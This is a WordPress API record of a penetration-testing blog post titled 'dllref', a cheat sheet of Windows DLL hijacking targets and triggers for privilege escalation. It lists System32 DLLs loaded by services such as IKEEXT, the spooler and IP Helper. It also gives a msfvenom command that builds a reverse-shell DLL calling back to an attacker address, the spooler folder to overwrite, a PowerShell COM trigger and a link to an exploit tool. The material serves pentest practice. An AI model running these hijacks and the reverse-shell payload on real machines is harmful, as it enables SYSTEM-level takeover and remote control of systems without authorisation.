{"id":562,"date":"2023-07-08T14:47:50","date_gmt":"2023-07-08T14:47:50","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?p=562"},"modified":"2023-07-08T14:57:58","modified_gmt":"2023-07-08T14:57:58","slug":"dllref","status":"publish","type":"post","link":"https:\/\/sirensecurity.io\/blog\/dllref\/","title":{"rendered":"dllref"},"content":{"rendered":"\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-background-dim\"><\/span><img loading=\"lazy\" decoding=\"async\" width=\"1456\" height=\"816\" class=\"wp-block-cover__image-background wp-image-566\" alt=\"\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2023\/07\/dllref.png\" data-object-fit=\"cover\"\/><div class=\"wp-block-cover__inner-container is-layout-flow wp-block-cover-is-layout-flow\">\n<p class=\"has-text-align-center has-large-font-size\">dllref - Windows Privilege Escalation &amp; DLL Triggers.<\/p>\n<\/div><\/div>\n\n\n\n<p><strong>.bashrc<\/strong><br>alias dllref='clear ; cat $HOME\/ref\/dllref'<\/p>\n\n\n\n<p><em>This is potentially an incomplete list.<\/em><\/p>\n\n\n\n<p><strong>dllref (flat file):<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>=================================================================================\nC:\\Windows\\System32\\wpcoreutil.dll (Windows Insider service `wisvc` triggerd by Clicking Start Windows Insider Program)\n=================================================================================\nC:\\Windows\\System32\\phoneinfo.dll (Windows Problem Reporting service)\nhttps:\/\/twitter.com\/404death\/status\/1262670619067334656  (without reboot by @jonasLyk)\n=================================================================================\n#dxgi - Trigger is check for protection update\nC:\\Windows\\System32\\wbem\\dxgi.dll  (windows security -> check for protection update)\n=================================================================================\n#tzres.dll\nC:\\Windows\\System32\\wbem\\tzres.dll (systeminfo, NetworkService) \n=================================================================================\n### Need to reboot to get NT AUTHORITY\\SYSTEM (hijack dll) ###\nC:\\Windows\\System32\\wlbsctrl.dll (IKEEXT service)\nC:\\Windows\\System32\\wbem\\wbemcomn.dll (IP Helper)\n=================================================================================\nC:\\Windows\\System32\\ualapi.dll (spooler service)\nhttp:&#47;&#47;www.hexacorn.com\/blog\/2016\/11\/08\/beyond-good-ol-run-key-part-50\/\n=================================================================================\nC:\\Windows\\System32\\fveapi.dll (ShellHWDetection Service)  @bohops\n=================================================================================\nC:\\Windows\\System32\\Wow64Log.dll (this dll loaded by other third party services such as GoogleUpdate.exe)\nhttp:\/\/waleedassar.blogspot.com\/2013\/01\/wow64logdll.html\n=================================================================================\n#DLL\nmsfvenom -a x64 -p windows\/x64\/shell_reverse_tcp LHOST=192.168.45.190 LPORT=4444 -f dll -o Printconfig.dll\n\n#Overwrite:\nC:\\Windows\\System32\\spool\\drivers\\x64\\3\\\n\n#Trigger\n$type = &#91;Type]::GetTypeFromCLSID(\"{854A20FB-2D44-457D-992F-EF13785D2B51}\")\n$object = &#91;Activator]::CreateInstance($type)\n=================================================================================\n#ALL ABOVE REQUIRE ADMIN READ\/WRITE\nhttps:\/\/github.com\/CsEnox\/SeManageVolumeExploit\/\nSeManageVolumeExploit.exe\n=================================================================================\n<\/code><\/pre>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>.bashrcalias dllref='clear ; cat $HOME\/ref\/dllref' This is potentially an incomplete list. dllref (flat file):<\/p>\n","protected":false},"author":1,"featured_media":566,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[91,89,88,12,4,90,93,92],"class_list":["post-562","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-s1ren","tag-dll-hijacking","tag-dll-reference","tag-dllref","tag-pentest","tag-s1ren","tag-windows-dll-hijacking","tag-windows-privesc","tag-windows-privilege-escalation"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/562","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=562"}],"version-history":[{"count":6,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/562\/revisions"}],"predecessor-version":[{"id":571,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/562\/revisions\/571"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media\/566"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=562"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/categories?post=562"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/tags?post=562"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}